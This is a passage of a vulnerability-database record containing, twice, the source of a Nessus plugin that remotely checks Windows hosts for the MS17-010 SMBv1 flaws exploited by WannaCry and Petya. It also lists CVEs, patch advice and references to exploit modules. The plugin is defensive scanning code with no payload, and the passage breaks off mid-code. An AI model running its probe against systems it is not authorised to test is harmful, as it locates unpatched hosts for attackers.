script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper 
handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # 
https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. 
For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t 
raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! 
isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. 
For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-18T12:44:33", "differentElements": ["vpr"], "edition": 12}, {"bulletin": {"id": "MS17-010.NASL", "hash": "c5c146b305e2f4b1abd96ec9c5d3d69f", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?b9d9ebf9", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?8dcab5e4", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?234f8ef8"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-19T00:54:11", "history": [], "viewCount": 7182, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": 
["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96705", 
"SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": 
"2021-10-19T00:54:11", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-19T00:54:11", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper 
handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # 
https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. 
For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word 